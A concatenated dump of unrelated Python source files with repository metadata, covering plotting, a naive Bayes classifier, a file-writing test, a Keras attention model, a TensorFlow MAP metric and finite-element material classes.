    plt.plot(lda, (1-T-R)*100,'r', label = 'Device absorption')
    # NOTE(review): the next five plots all draw A[:,1] with different
    # labels — likely a copy-paste slip (compare the if branch, which
    # steps through A[:,1..5]).
    plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$ NP \n (30%, Brugg.)')
    plt.plot(lda, A[:,1]*100,':', label = 'Abs. $SiO_{2}$ NP \n (30%, Brugg.)')
    plt.plot(lda, A[:,1]*100,':', label = 'Abs. $SiO_{2}$')
    plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$')
    plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Ag$')
    plt.xlabel('Wavelength (nm)')
    plt.ylabel('%')
    #plt.title('Transmission, reflection, and absorption at normal incidence')
    plt.legend()
    plt.show()
    #plt.plot(lda, Aideal[:,3]*100,'y:', label = 'SiO2 native oxide absorption')
#    plt.xlabel('Wavelength (nm)')
#    plt.ylabel('Absorption (%)')
#    #plt.title('Absorption at normal incidence')
#    #ax.legend().draggable()
#
#    plt.tight_layout(rect=[-0.10,0,0.75,1])
#    plt.legend(bbox_to_anchor=(1.04, 1))
#    plt.show()
bfa0c62575bd34e4cba52c7f7400939a06bfae09 | 1,592 | py | Python | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | 1 | 2020-07-08T06:17:54.000Z | 2020-07-08T06:17:54.000Z | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | null | null | null | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | null | null | null | import os
import csv
import pickle
import pandas as pd
import numpy as np
import sklearn
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
from sklearn.naive_bayes import MultinomialNB
from comments.base import cut_words, STOP_WORDS, DATA_DIR
# Access all data from csv file: comment text plus a 'useful' label
# (presumably binary — confirm against the dataset).
df = pd.read_csv(os.path.join(DATA_DIR, 'fin_final.csv'), skipinitialspace=True)
X = df['comments']
y = df['useful']

# 10-fold cross-validated multinomial naive Bayes over bag-of-words counts.
kf = KFold(n_splits=10, random_state=42, shuffle=True)
accuracies, precisions, recalls, f1s = [], [], [], []
for train_index, test_index in kf.split(X):
    X_train = X[train_index]
    y_train = y[train_index]
    X_test = X[test_index]
    y_test = y[test_index]
    # Vectorizer is fitted inside the fold, so no vocabulary leakage from
    # the held-out split.
    vectorizer = sklearn.feature_extraction.text.CountVectorizer(
        tokenizer=cut_words,
        stop_words=STOP_WORDS)
    training_data = vectorizer.fit_transform(X_train)
    testing_data = vectorizer.transform(X_test)
    naive_bayes = MultinomialNB()
    naive_bayes.fit(training_data, y_train)
    preds = naive_bayes.predict(testing_data)
    # Collect the four standard classification metrics for this fold.
    accuracies.append(accuracy_score(y_test, preds))
    precisions.append(precision_score(y_test, preds))
    recalls.append(recall_score(y_test, preds))
    f1s.append(f1_score(y_test, preds))

# Average each metric across the 10 folds and report to stdout.
average_accuracy = np.mean(accuracies)
average_precision = np.mean(precisions)
average_recall = np.mean(recalls)
average_f1 = np.mean(f1s)
print(average_accuracy)
print(average_precision)
print(average_recall)
print(average_f1)
| 31.215686 | 83 | 0.766332 | 232 | 1,592 | 5 | 0.344828 | 0.025862 | 0.034483 | 0.051724 | 0.053448 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008017 | 0.138191 | 1,592 | 50 | 84 | 31.84 | 0.837464 | 0.018216 | 0 | 0 | 0 | 0 | 0.017297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.268293 | 0 | 0.268293 | 0.097561 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa123a46e6c48d9f51257a647096c4fc2fe9422 | 818 | py | Python | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | import os
import numpy as np
from pymt.grids import RasterField
from pymt.printers.bov.database import Database
def test_bov_database(tmpdir):
    """Repeated writes of one field append sequentially numbered BOV files."""
    values = np.arange(6.)
    field = RasterField((3, 2), (1., 1.), (0., 0.))
    field.add_field("Elevation", values, centering="point")

    with tmpdir.as_cwd():
        db = Database()
        db.open("Bov_database.bov", "Elevation")

        # BOV files store one variable each, so every write produces a new
        # file with an incrementing counter in its name.
        for expected in ("Bov_database_0000.bov",
                         "Bov_database_0001.bov",
                         "Bov_database_0002.bov"):
            db.write(field)
            assert os.path.isfile(expected)
            # Mutate the array in place so the next write sees new values.
            values *= 2.
        db.close()
| 24.787879 | 72 | 0.625917 | 114 | 818 | 4.394737 | 0.438596 | 0.131737 | 0.071856 | 0.107784 | 0.277445 | 0.277445 | 0.277445 | 0.277445 | 0.277445 | 0.195609 | 0 | 0.034314 | 0.251834 | 818 | 32 | 73 | 25.5625 | 0.784314 | 0.141809 | 0 | 0.25 | 0 | 0 | 0.145923 | 0.090129 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.2 | 0 | 0.25 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa18c419b9bddacf91037d88c2cff23c5558bdb | 8,820 | py | Python | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | 2 | 2021-11-17T05:08:01.000Z | 2021-11-28T17:17:08.000Z | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | null | null | null | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | null | null | null |
import flowws
from flowws import Argument as Arg
import tensorflow as tf
from tensorflow import keras
from .internal import HUGE_FLOAT, PairwiseVectorDifference, \
PairwiseVectorDifferenceSum, VectorAttention, Vector2VectorAttention
class CoarseGrainAttention(Vector2VectorAttention):
    """Vector attention that also attends over per-child (fine-grain) values.

    Inputs to the layer are ``(positions, values, child_values)``; the
    output mask follows the child values (see :meth:`compute_mask`).
    """

    def build(self, input_shape):
        v_shape = input_shape[1]
        # Build the parent layer on (positions, values) only; the child
        # values get their own join kernel below.
        result = super().build(input_shape[:-1])

        if self.join_fun == 'concat':
            # always joining neighborhood values and invariant values
            stdev = tf.sqrt(2./3/v_shape[-1])
            self.join_kernels.append(self.add_weight(
                name='join_kernel_{}'.format(3), shape=(v_shape[-1], v_shape[-1]),
                initializer=keras.initializers.RandomNormal(stddev=stdev)
            ))

        return result

    def compute_mask(self, inputs, mask=None):
        # The output is indexed like the child values, so propagate only
        # their mask.
        if mask is None:
            return
        (r_mask, v_mask, cv_mask) = mask
        return cv_mask

    def _expand_products(self, positions, values):
        # Insert an extra broadcast axis (for the child dimension) into the
        # parent layer's expanded products.
        (bcast, invars, covars, vs) = super()._expand_products(positions, values)
        new_bcast = []
        for idx in bcast:
            idx = list(idx)
            idx.insert(-1 - self.rank, None)
            new_bcast.append(idx)
        invars = tf.expand_dims(invars, -2 - self.rank)
        covars = tf.expand_dims(covars, -2 - self.rank)
        new_vs = [tf.expand_dims(v, -2 - self.rank) for v in vs]
        return new_bcast, invars, covars, new_vs

    def _intermediates(self, inputs, mask=None):
        """Compute attention weights, invariants and the covariant output."""
        (positions, values, child_values) = inputs
        (broadcast_indices, invariants, covariants, expanded_values) = \
            self._expand_products(positions, values)
        neighborhood_values = self.merge_fun_(*expanded_values)
        invar_values = self.value_net(invariants)

        # Swap the child axis into place before broadcasting child values
        # against the neighborhood products.
        swap_i = -self.rank - 1
        swap_j = swap_i - 1
        child_expand_indices = list(broadcast_indices[-1])
        child_expand_indices[swap_i], child_expand_indices[swap_j] = \
            child_expand_indices[swap_j], child_expand_indices[swap_i]
        child_values = child_values[child_expand_indices]

        joined_values = self.join_fun_(child_values, invar_values, neighborhood_values)
        scales = self.scale_net(joined_values)
        scores = self.score_net(joined_values)
        old_shape = tf.shape(scores)

        if mask is not None:
            # Broadcast the position/value masks over the product axes and
            # force masked scores to -HUGE_FLOAT so softmax zeroes them.
            (position_mask, value_mask, child_value_mask) = mask
            if position_mask is not None:
                position_mask = tf.expand_dims(position_mask, -1)
                position_mask = tf.reduce_all([position_mask[idx] for idx in broadcast_indices[:-1]], axis=0)
            else:
                position_mask = True
            if value_mask is not None:
                value_mask = tf.expand_dims(value_mask, -1)
                value_mask = tf.reduce_all([value_mask[idx] for idx in broadcast_indices[:-1]], axis=0)
            else:
                value_mask = True
            product_mask = tf.logical_and(position_mask, value_mask)
            scores = tf.where(product_mask, scores, -HUGE_FLOAT)

        # Flatten the attended axes, softmax over them, then restore shape.
        if self.reduce:
            dims = -(self.rank + 1)
            reduce_axes = tuple(-i - 2 for i in range(self.rank))
        else:
            dims = -self.rank
            reduce_axes = tuple(-i - 2 for i in range(self.rank - 1))

        shape = tf.concat([old_shape[:dims], tf.math.reduce_prod(old_shape[dims:], keepdims=True)], -1)
        scores = tf.reshape(scores, shape)
        attention = tf.reshape(tf.nn.softmax(scores), old_shape)
        output = tf.reduce_sum(attention*covariants*scales, reduce_axes)
        return dict(attention=attention, output=output, invariants=invariants)
@flowws.add_stage_arguments
class PDBInverseCoarseGrain(flowws.Stage):
    """Build a geometric attention network for a coarse-grain backmapping task.

    This module specifies the architecture of a network to produce
    atomic coordinates from a set of coarse-grained beads.

    On :meth:`run`, the model's symbolic inputs/outputs and auxiliary
    attention/invariant models are registered into ``scope``.
    """

    ARGS = [
        Arg('rank', None, int, 2,
            help='Degree of correlations (n-vectors) to consider'),
        Arg('n_dim', '-n', int, 32,
            help='Working dimensionality of point representations'),
        Arg('dilation', None, float, 2,
            help='Working dimension dilation factor for MLP components'),
        Arg('merge_fun', '-m', str, 'concat',
            help='Method to merge point representations'),
        Arg('join_fun', '-j', str, 'concat',
            help='Method to join invariant and point representations'),
        Arg('n_blocks_coarse', None, int, 2,
            help='Number of deep blocks to use in the coarse-grain space'),
        # Fixed copy-paste in help text: this one controls the fine-grain blocks.
        Arg('n_blocks_fine', None, int, 2,
            help='Number of deep blocks to use in the fine-grain space'),
        Arg('block_nonlinearity', None, bool, True,
            help='If True, add a nonlinearity to the end of each block'),
        Arg('residual', '-r', bool, True,
            help='If True, use residual connections within blocks'),
        Arg('activation', '-a', str, 'relu',
            help='Activation function to use inside the network'),
        Arg('attention_vector_inputs', None, bool, False,
            help='Use input vectors for vector-vector attention'),
        Arg('attention_learn_projection', None, bool, False,
            help='Use learned projection weights for vector-vector attention'),
    ]

    def run(self, scope, storage):
        """Assemble the network and store its pieces in ``scope``."""
        rank = self.arguments['rank']
        n_dim = self.arguments['n_dim']
        merge_fun = self.arguments['merge_fun']
        join_fun = self.arguments['join_fun']

        # Peek at one batch to size the symbolic inputs.
        train_data = scope['train_generator']
        sample_batch = next(train_data)

        x_in = keras.layers.Input(sample_batch[0][0].shape[1:], name='rij')
        v_in = keras.layers.Input(sample_batch[0][1].shape[1:], name='tij')
        cv_in = keras.layers.Input(sample_batch[0][2].shape[1:], name='child_t')
        # mask_zero=True: child type id 0 is treated as padding.
        cv_emb = keras.layers.Embedding(len(scope['child_type_names']), n_dim, mask_zero=True)(cv_in)

        dilation_dim = round(n_dim*self.arguments['dilation'])

        def make_scorefun():
            # Small MLP producing one attention logit per product.
            layers = [keras.layers.Dense(dilation_dim)]
            layers.append(keras.layers.Activation(self.arguments['activation']))
            layers.append(keras.layers.Dense(1))
            return keras.models.Sequential(layers)

        def make_valuefun(dim):
            # Value MLP with layer normalization.
            layers = [keras.layers.Dense(dilation_dim)]
            layers.append(keras.layers.LayerNormalization())
            layers.append(keras.layers.Activation(self.arguments['activation']))
            layers.append(keras.layers.Dense(dim))
            return keras.models.Sequential(layers)

        def make_block(last):
            # One residual attention block in the coarse-grain space.
            residual_in = last
            last = VectorAttention(
                make_scorefun(), make_valuefun(n_dim), False, rank=rank,
                join_fun=join_fun,
                merge_fun=merge_fun)([x_in, last])
            if self.arguments['block_nonlinearity']:
                last = make_valuefun(n_dim)(last)
            if self.arguments['residual']:
                last = last + residual_in
            return last

        def make_vector_block(vec):
            # One residual vector-to-vector attention block in the
            # fine-grain space; closes over delta_v defined below.
            residual_in = vec
            vec = PairwiseVectorDifference()(vec)
            (vec, ivs, att) = Vector2VectorAttention(
                make_scorefun(), make_valuefun(n_dim), make_valuefun(1), True, rank=rank,
                join_fun=join_fun, merge_fun=merge_fun,
                use_input_vectors=self.arguments['attention_vector_inputs'],
                learn_vector_projection=self.arguments['attention_learn_projection'])(
                    [vec, delta_v], return_invariants=True, return_attention=True)
            if self.arguments['residual']:
                vec = residual_in + vec
            return vec

        last = keras.layers.Dense(n_dim)(v_in)
        for _ in range(self.arguments['n_blocks_coarse']):
            last = make_block(last)

        # Map coarse-grain representations onto child (atom) vectors; ivs/att
        # from this stage back the invariant/attention models exported below.
        (vec, ivs, att) = CoarseGrainAttention(
            make_scorefun(), make_valuefun(n_dim), make_valuefun(1), True, name='final_attention',
            rank=1,
            join_fun=join_fun,
            merge_fun=merge_fun)(
                [x_in, last, cv_emb], return_invariants=True, return_attention=True)

        delta_v = PairwiseVectorDifferenceSum()(cv_emb)
        delta_v = keras.layers.Dense(n_dim)(delta_v)
        for _ in range(self.arguments['n_blocks_fine']):
            vec = make_vector_block(vec)

        scope['input_symbol'] = [x_in, v_in, cv_in]
        scope['output'] = vec
        scope['loss'] = 'mse'
        scope['attention_model'] = keras.models.Model([x_in, v_in, cv_in], att)
        scope['invariant_model'] = keras.models.Model([x_in, v_in, cv_in], ivs)
| 41.023256 | 109 | 0.622222 | 1,095 | 8,820 | 4.8 | 0.206393 | 0.034627 | 0.020548 | 0.02188 | 0.276256 | 0.246195 | 0.209094 | 0.165335 | 0.165335 | 0.152397 | 0 | 0.007422 | 0.26678 | 8,820 | 214 | 110 | 41.214953 | 0.805319 | 0.028118 | 0 | 0.090361 | 0 | 0 | 0.123845 | 0.011461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054217 | false | 0 | 0.03012 | 0 | 0.156627 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa221e1979ae3e08b502d632de23a867c0630aa | 3,565 | py | Python | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from trainer import features
# rough approximation for MAP metric for measuring ad quality
# roughness comes from batch sizes falling between groups of
# display ids
# hack because of name clashes. Probably makes sense to rename features
# hack because of name clashes. Probably makes sense to rename features
DISPLAY_ID_COLUMN = features.DISPLAY_ID_COLUMN


def map_custom_metric(features, labels, predictions):
    """Approximate MAP@12 grouped by display_id, as an Estimator metric.

    Rough because batch boundaries can split a display_id group.
    """
    display_ids = tf.reshape(features[DISPLAY_ID_COLUMN], [-1])
    # Positive-class probability; labels column 0 holds the click target.
    predictions = predictions['probabilities'][:, 1]
    labels = labels[:, 0]

    # Processing unique display_ids, indexes and counts
    # Sorting needed in case the same display_id occurs in two different places
    sorted_ids = tf.argsort(display_ids)
    display_ids = tf.gather(display_ids, indices=sorted_ids)
    predictions = tf.gather(predictions, indices=sorted_ids)
    labels = tf.gather(labels, indices=sorted_ids)

    _, display_ids_idx, display_ids_ads_count = tf.unique_with_counts(
        display_ids, out_idx=tf.int64)
    # Pad each group's row to width 30 — assumes at most 30 ads per
    # display_id; TODO confirm against the dataset.
    pad_length = 30 - tf.reduce_max(display_ids_ads_count)
    pad_fn = lambda x: tf.pad(x, [(0, 0), (0, pad_length)])

    # One row per display_id, one column per ad within the group.
    preds = tf.RaggedTensor.from_value_rowids(
        predictions, display_ids_idx).to_tensor()
    labels = tf.RaggedTensor.from_value_rowids(
        labels, display_ids_idx).to_tensor()
    # Reduce per-ad labels to the index of the clicked ad in each group.
    labels = tf.argmax(labels, axis=1)

    return {
        'map': tf.compat.v1.metrics.average_precision_at_k(
            predictions=pad_fn(preds),
            labels=labels,
            k=12,
            name="streaming_map")}
IS_LEAK_COLUMN = features.IS_LEAK_COLUMN


def map_custom_metric_with_leak(features, labels, predictions):
    """MAP@12 per display_id, boosting rows flagged as leaked.

    Same grouping logic as ``map_custom_metric``; leaked rows have 1.0
    added to their score — presumably to rank them above all genuine
    probabilities (which are <= 1). TODO confirm the intended semantics.
    """
    display_ids = features[DISPLAY_ID_COLUMN]
    display_ids = tf.reshape(display_ids, [-1])
    is_leak_tf = features[IS_LEAK_COLUMN]
    is_leak_tf = tf.reshape(is_leak_tf, [-1])

    predictions = predictions['probabilities'][:, 1]
    # Add the (0/1) leak flag to the score.
    predictions = predictions + tf.cast(is_leak_tf, tf.float32)
    labels = labels[:, 0]

    # Processing unique display_ids, indexes and counts
    # Sorting needed in case the same display_id occurs in two different places
    sorted_ids = tf.argsort(display_ids)
    display_ids = tf.gather(display_ids, indices=sorted_ids)
    predictions = tf.gather(predictions, indices=sorted_ids)
    labels = tf.gather(labels, indices=sorted_ids)

    _, display_ids_idx, display_ids_ads_count = tf.unique_with_counts(
        display_ids, out_idx=tf.int64)
    # Pad each group row to width 30 — assumes <= 30 ads per display_id.
    pad_length = 30 - tf.reduce_max(display_ids_ads_count)
    pad_fn = lambda x: tf.pad(x, [(0, 0), (0, pad_length)])

    preds = tf.RaggedTensor.from_value_rowids(predictions, display_ids_idx).to_tensor()
    labels = tf.RaggedTensor.from_value_rowids(labels, display_ids_idx).to_tensor()
    labels = tf.argmax(labels, axis=1)

    return {
        'map_with_leak': tf.compat.v1.metrics.average_precision_at_k(
            predictions=pad_fn(preds),
            labels=labels,
            k=12,
            name="streaming_map_with_leak")}
| 38.75 | 87 | 0.722861 | 506 | 3,565 | 4.859684 | 0.304348 | 0.101667 | 0.03904 | 0.037414 | 0.616511 | 0.53843 | 0.53843 | 0.53843 | 0.53843 | 0.53843 | 0 | 0.013425 | 0.185133 | 3,565 | 91 | 88 | 39.175824 | 0.833046 | 0.289201 | 0 | 0.576923 | 0 | 0 | 0.031051 | 0.009156 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa6e37ce663c12f0fdad157e24b3fc3bb9524e5 | 11,809 | py | Python | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 28 | 2018-02-16T17:21:47.000Z | 2022-02-27T21:42:17.000Z | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 115 | 2017-11-30T17:12:47.000Z | 2022-01-26T07:41:34.000Z | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 13 | 2018-05-08T13:03:28.000Z | 2022-01-23T13:37:06.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from math import log
# Author(s): Andrew Liew (github.com/andrewliew)
# Public API of this module.
__all__ = [
    'Material',
    'Concrete',
    'ConcreteSmearedCrack',
    'ConcreteDamagedPlasticity',
    'ElasticIsotropic',
    'Stiff',
    'ElasticOrthotropic',
    'ElasticPlastic',
    # 'ThermalMaterial',  # defined below but not exported -- confirm intent
    'Steel'
]
class Material(object):
    """Base class for all material definitions.

    Parameters
    ----------
    name : str
        Name of the Material object.

    Attributes
    ----------
    name : str
        Name of the Material object.

    """

    def __init__(self, name):
        self.__name__ = 'Material'
        self.name = name
        # Attribute names printed by __str__; subclasses extend this list.
        self.attr_list = ['name']

    def __str__(self):
        # Prints a summary table; returns '' so print(obj) adds nothing extra.
        print('\n')
        print(f'compas_fea {self.__name__} object')
        print('-' * (len(self.__name__) + 18))
        for attr in self.attr_list:
            print(f'{attr:<11} : {getattr(self, attr)}')
        return ''

    def __repr__(self):
        return f'{self.__name__}({self.name})'
# ==============================================================================
# linear elastic
# ==============================================================================
class ElasticIsotropic(Material):
    """Homogeneous, isotropic, linear-elastic material.

    Parameters
    ----------
    name : str
        Material name.
    E : float
        Young's modulus E [Pa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].
    tension : bool
        Can take tension.
    compression : bool
        Can take compression.

    """

    def __init__(self, name, E, v, p, tension=True, compression=True):
        Material.__init__(self, name=name)

        self.__name__ = 'ElasticIsotropic'
        self.name = name
        # Moduli stored as dicts for a uniform interface with the
        # orthotropic material.
        self.E = dict(E=E)
        self.v = dict(v=v)
        # Isotropic shear modulus: G = E / (2 (1 + v)).
        self.G = dict(G=E / (2.0 * (1 + v)))
        self.p = p
        self.tension = tension
        self.compression = compression
        self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
class Stiff(ElasticIsotropic):
    """Practically rigid, massless elastic material.

    Parameters
    ----------
    name : str
        Material name.
    E : float
        Young's modulus E [Pa].

    """

    def __init__(self, name, E=10**13):
        # Delegate to the isotropic material with negligible density.
        ElasticIsotropic.__init__(self, name=name, E=E, v=0.3, p=10**(-1))

        self.__name__ = 'Stiff'
class ElasticOrthotropic(Material):
    """Homogeneous, orthotropic, linear-elastic material.

    Parameters
    ----------
    name : str
        Material name.
    Ex : float
        Young's modulus Ex in x direction [Pa].
    Ey : float
        Young's modulus Ey in y direction [Pa].
    Ez : float
        Young's modulus Ez in z direction [Pa].
    vxy : float
        Poisson's ratio vxy in x-y directions [-].
    vyz : float
        Poisson's ratio vyz in y-z directions [-].
    vzx : float
        Poisson's ratio vzx in z-x directions [-].
    Gxy : float
        Shear modulus Gxy in x-y directions [Pa].
    Gyz : float
        Shear modulus Gyz in y-z directions [Pa].
    Gzx : float
        Shear modulus Gzx in z-x directions [Pa].
    p : float
        Density [kg/m3].
    tension : bool
        Can take tension.
    compression : bool
        Can take compression.

    Notes
    -----
    - Can be created but is currently not implemented.

    """

    def __init__(self, name, Ex, Ey, Ez, vxy, vyz, vzx, Gxy, Gyz, Gzx, p, tension=True, compression=True):
        Material.__init__(self, name=name)

        self.__name__ = 'ElasticOrthotropic'
        self.name = name
        # Directional components grouped by family (stiffness, Poisson, shear).
        self.E = dict(Ex=Ex, Ey=Ey, Ez=Ez)
        self.v = dict(vxy=vxy, vyz=vyz, vzx=vzx)
        self.G = dict(Gxy=Gxy, Gyz=Gyz, Gzx=Gzx)
        self.p = p
        self.tension = tension
        self.compression = compression
        self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear general
# ==============================================================================
class ElasticPlastic(Material):
    """Elastic-plastic, isotropic and homogeneous material.

    Parameters
    ----------
    name : str
        Material name.
    E : float
        Young's modulus E [Pa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].
    f : list
        Plastic stress data (positive tension values) [Pa].
    e : list
        Plastic strain data (positive tension values) [-].

    Notes
    -----
    - Plastic stress--strain pairs applies to both compression and tension.

    """

    def __init__(self, name, E, v, p, f, e):
        Material.__init__(self, name=name)

        # Mirror the tension curve into compression with flipped signs.
        fc = [-fi for fi in f]
        ec = [-ei for ei in e]

        self.__name__ = 'ElasticPlastic'
        self.name = name
        self.E = dict(E=E)
        self.v = dict(v=v)
        self.G = dict(G=E / (2.0 * (1 + v)))
        self.p = p
        self.tension = dict(f=f, e=e)
        self.compression = dict(f=fc, e=ec)
        self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear metal
# ==============================================================================
class Steel(Material):
    """Bi-linear steel with given yield stress.

    Parameters
    ----------
    name : str
        Material name.
    fy : float
        Yield stress [MPa].
    fu : float
        Ultimate stress [MPa].
    eu : float
        Ultimate strain [%].
    E : float
        Young's modulus E [GPa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].

    """

    def __init__(self, name, fy=355, fu=None, eu=20, E=210, v=0.3, p=7850):
        Material.__init__(self, name=name)

        # Convert to base SI units: E [GPa]->[Pa], fy/fu [MPa]->[Pa], eu [%]->[-].
        E *= 10.**9
        fy *= 10.**6
        eu *= 0.01

        # Default the ultimate stress to the yield stress (perfectly plastic).
        if not fu:
            fu = fy
        else:
            fu *= 10.**6

        # Plastic strain at ultimate: total strain minus elastic strain fy/E.
        ep = eu - fy / E
        f = [fy, fu]
        e = [0, ep]
        # Compression curve mirrors tension with flipped signs.
        fc = [-i for i in f]
        ec = [-i for i in e]

        self.__name__ = 'Steel'
        self.name = name
        self.fy = fy
        self.fu = fu
        self.eu = eu
        self.ep = ep
        self.E = {'E': E}
        self.v = {'v': v}
        self.G = {'G': 0.5 * E / (1 + v)}
        self.p = p
        self.tension = {'f': f, 'e': e}
        self.compression = {'f': fc, 'e': ec}
        self.attr_list.extend(['fy', 'fu', 'eu', 'ep', 'E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear timber
# ==============================================================================
# ==============================================================================
# non-linear masonry
# ==============================================================================
# ==============================================================================
# non-linear concrete
# ==============================================================================
class Concrete(Material):
    """Elastic and plastic-cracking Eurocode based concrete material.

    Parameters
    ----------
    name : str
        Material name.
    fck : float
        Characteristic (5%) 28 day cylinder strength [MPa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].
    fr : list
        Failure ratios.

    Notes
    -----
    - The concrete model is based on Eurocode 2 up to fck=90 MPa.

    """

    def __init__(self, name, fck, v=0.2, p=2400, fr=None):
        Material.__init__(self, name=name)

        # Strain sampling increment for the compression curve.
        de = 0.0001
        # Mean compressive strength and secant modulus (EC2-style relations).
        fcm = fck + 8
        Ecm = 22 * 10**3 * (fcm / 10.)**0.3
        # Strain at peak stress and ultimate strain.
        ec1 = min(0.7 * fcm**0.31, 2.8) * 0.001
        ecu1 = 0.0035 if fck < 50 else (2.8 + 27 * ((98 - fcm) / 100.)**4) * 0.001

        k = 1.05 * Ecm * ec1 / fcm
        # Sample total strains up to ecu1 and shift to plastic strains.
        e = [i * de for i in range(int(ecu1 / de) + 1)]
        ec = [ei - e[1] for ei in e[1:]]
        # Mean tensile strength; the formula switches at fck = 50 MPa.
        fctm = 0.3 * fck**(2. / 3.) if fck <= 50 else 2.12 * log(1 + fcm / 10.)
        # Nonlinear compression stress--strain curve, converted to Pa.
        f = [10**6 * fcm * (k * (ei / ec1) - (ei / ec1)**2) / (1. + (k - 2) * (ei / ec1)) for ei in e]

        # Initial secant modulus from the first sampled point.
        E = f[1] / e[1]
        ft = [1., 0.]
        et = [0., 0.001]
        if not fr:
            fr = [1.16, fctm / fcm]

        self.__name__ = 'Concrete'
        self.name = name
        self.fck = fck * 10.**6
        self.E = {'E': E}
        self.v = {'v': v}
        self.G = {'G': 0.5 * E / (1 + v)}
        self.p = p
        self.tension = {'f': ft, 'e': et}
        self.compression = {'f': f[1:], 'e': ec}
        self.fratios = fr
        self.attr_list.extend(['fck', 'fratios', 'E', 'v', 'G', 'p', 'tension', 'compression'])
class ConcreteSmearedCrack(Material):
    """Elastic and plastic, cracking concrete material.

    Parameters
    ----------
    name : str
        Material name.
    E : float
        Young's modulus E [Pa].
    v : float
        Poisson's ratio v [-].
    p : float
        Density [kg/m3].
    fc : list
        Plastic stress data in compression [Pa].
    ec : list
        Plastic strain data in compression [-].
    ft : list
        Plastic stress data in tension [-].
    et : list
